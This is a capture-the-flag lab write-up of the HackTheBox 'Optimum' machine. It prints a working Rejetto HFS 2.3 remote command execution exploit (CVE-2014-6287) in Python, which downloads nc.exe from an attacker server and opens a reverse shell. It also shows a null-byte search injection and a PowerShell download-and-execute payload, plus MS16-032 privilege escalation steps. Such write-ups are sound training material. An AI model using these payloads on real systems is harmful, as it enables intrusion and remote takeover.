Ethical Hacking Lessons — Optimum Writeup

9 min readOct 27, 2019

This write-up is for the hackthebox Optimum machine. Like some other machines on the hackthebox platform, this machine also highlights the importance of keeping your Operating System and any installed applications upto date. In this write-up, I used three power-shell frameworks Nishang, Sherlock and Empire to take root-level access to the box.

Its another Easy rated Windows machine with an IP address of 10.10.10.8. Its radar-graph is as follows.

Recon

Let’s start active recon with the Nmap TCP scan.

nmap -A -T4 -p- -oX tcp_scan_result.xml 10.10.10.8

Below are the results produced by the scan.

The UPD scan didn’t show any open ports.

Recon Results Analysis

Only the port 80 is open and running HTTPFile Server.

Enumeration

Browsing to the 10.10.10.8 takes to the following HTTPFile Server page.

Clicking on the HTTPFile Server 2.3 link leads to rejetto website.

As the name of the service suggests, this is basically a File server running over HTTP. Optimum is running its version 2.3. Let’s do a quick searcshploit to see if there are any known vulnerabilities.

As you can see in the image above, there are a couple of exploits available that can provide Remote command execution. These are the ones that will be interesting for us to exploit.

Enumeration Analysis

We determined that this box is running a vulnerable version of HTTPFile Server.

Exploitation

Both the exploits (34668, 39161) lead to CVE-2014–6287. The US government resource link provided on the CVE page describes the following explanation of how this vulnerability could be exploited.

Rejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in parserLib.pas that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system. As an example, the following search submitted to a vulnerable HFS instance launches calculator on the host Microsoft Windows system:
http://<vulnerable instance>/?search==%00{.exec|calc.}

This means that we can use the following command with a payload to get the Remote Command Execution (RCE).

http://10.10.10.8/?search==%00{.exec|InsertYourPayloadHere}

Let’s try out this RCE with a pingback to our Kali Linux machine. In order to confirm that ping is successfully sent, let’s launch tcpdump on the kali machine first.

Now replace the payload with a ping command as shown below.

At this point, we see that ping has been sent to our attack machine.

This confirms the existence of RCE. The exploit for EDB-ID 34668 shows the same RCE. I am going to exploit this machine using two different ways. First through netcat and then using Powershell.

Exploit using Netcat

Let’s start by looking into exploit EDB-ID 39161.

Its URL takes us to the following python script that could be used to exploit this RCE.

import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "192.168.44.128" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""

Careful observation of the code shows that part of it is URL encoded. So let’s decode it using the online tool.

import urllib2
import systry:
 def script_create():
 urllib2.urlopen(“http://” sys.argv[1] “:” sys.argv[2] “/?search={. “ save “.}”)def execute_script():
 urllib2.urlopen(“http://” sys.argv[1] “:” sys.argv[2] “/?search={. “ exe “.}”)def nc_run():
 urllib2.urlopen(“http://” sys.argv[1] “:” sys.argv[2] “/?search={. “ exe1 “.}”)ip_addr = “192.168.44.128” #local IP address
 local_port = “443” # Local Port number
 vbs = “C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, “http://” ip_addr “/nc.exe”, False
xHttp.Sendwith bStrm
 .type = 1 ‘//binary
 .open
 .write xHttp.responseBody
 .savetofile “C:\Users\Public\nc.exe”, 2 ‘//overwrite
end with”
 save= “save|” vbs
 vbs2 = “cscript.exe C:\Users\Public\script.vbs”
 exe= “exec|” vbs2
 vbs3 = “C:\Users\Public\nc.exe -e cmd.exe “ ip_addr “ “ local_port
 exe1= “exec|” vbs3
 script_create()
 execute_script()
 nc_run()
except:
 print “””[.]Something went wrong..!
 Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
 Don’t forgot to change the Local IP address and Port number on the script”””

Let’s try to understand this code. There are two variables declared, ip_addr and local_port. These variables need to be initialized to the IP address of the attacking machine and the port where the reverse shell connects to the listener. There are three functions defined in this script as well.

script_create: This function creates a script.vbs file. When triggered, script.vbs downloads the nc.exe and saves into C:\Users\Public.
execute_script: This function triggers script.vbs created in script_create function.
nc_run: This function runs the downloaded Netcat executable that setups a reverse shell to the values set in ip_addr and local_port variables.

The python script also provides the following note for setting up the exploit.

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

So let’s find nc.exe from the Kali box and copy it into our working folder.

Now launch a web-server from the same folder so nc.exe could be downloaded through this interface.

Next, we trigger a listener on our attack box.

Now update the python script to use Kali Linux IP address and the listening port.

I saved this script as reverse-shell.py and invoke it as per the instructions.

Bingo, that gave us the low-privilege shell and the user flag.

Exploit using Powershell

In order to perform any exploit using PowerShell, we first need to make sure that it's available on that box. For that, we can just create another payload with a ping command issued via Powershell as shown below.

This ping request was received in the tcpdump traces that confirms powershell is available on that box. I then used nishang to try to get a reverse shell. Nishang, on its GitHub portal, is described as follows.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

One of the shells Nishang offers is Invoke-PowerShellTcp.ps1 that looks suitable for this use case.

This script provides various examples of how to use this script.

It's a good idea to copy this file to your working directory before making any changes.

Let’s modify the script to call the function with the IP address of our attack machine and the listening port.

So we need to set up a listener on the attack machine on port 4445.

nc -nlvp 4445

Ensure that the web-server setup using python3 still working and just use the following payload in the browser to attempt to get the reverse shell.

http://10.10.10.8/search=%00{.exec|c:\windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.Webclient).downloadString(‘http://10.10.14.2:80/Invoke-PowerShellTcp.ps1').}

As soon as this script is run, we see that the Invoke-PowerShellTcp.ps1 file gets downloaded in the web-server traces.

This gives us the reverse shell and the user flag again.

It's important to note that this time we got the PowerShell command prompt as opposed to a regular command prompt when we used nc.exe for exploitation.

Privilege Escalation

Now that we have a low-privilege access, its time to try to escalate to get the root-level access. One way of trying to get the privilege escalation is to use the Windows Exploit Suggester. This is a python script that takes the output of systeminfo command and provides suggestions about exploits that could be used. However, since we also got a Powershell based shell as well, let’s try to use Sherlock Powershell script to find the possible ways of getting a local priv escalation. Sherlock is defined as follows.

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

It contains Sherlock.ps1 file that has a Find-AllVulns function that could be used to find the related vulnerabilities. We need to modify the Sherlock.ps1 file to include a call to Find-AllVulns function towards the end of the file as shown below.

After copying the sherlock.ps1 into the web-server folder, we can invoke this function that provides a list of possible vulnerabilities for the target box.

As you can see from the output, this script determines which CVEs could be vulnerable. Now that we know what vulnerabilities could be used, let’s try to see if another Powershell library Empire could be used for the exploitation. Please note that the Empire project is no more supported. The project is described as follows:

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture.

If we look at various scripts available for Empire’s privesc library, there is one for MS16-032. This vulnerability has been raised in Sherlock script as well.

The source code for Invoke-MS16032.ps1 provides its usage as follows.

C:\PS> Invoke-MS16–032 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://google.com')"

So we need to run this script and provide an exploit to get the reverse shell. We can use the same Nishang’s Invoke-PowerShellTcp.ps1. Let’s rename this file to exploit-shell.ps1 as I already have a Invoke-PowerShellTcp.ps1 file in the web-server’s folder. I just need to update the IP address for the attack machine with port 4446 in the exploit-shell.ps1 file.

We can now go back to Invoke-MS16032.ps1 script to include a call to this newly created exploit-shell.ps1 as shown below.

Now we just have to call the Invoke-MS16032.ps1 script from the low-privilege shell. That call shortly brings the following message about getting a SYSTEM shell.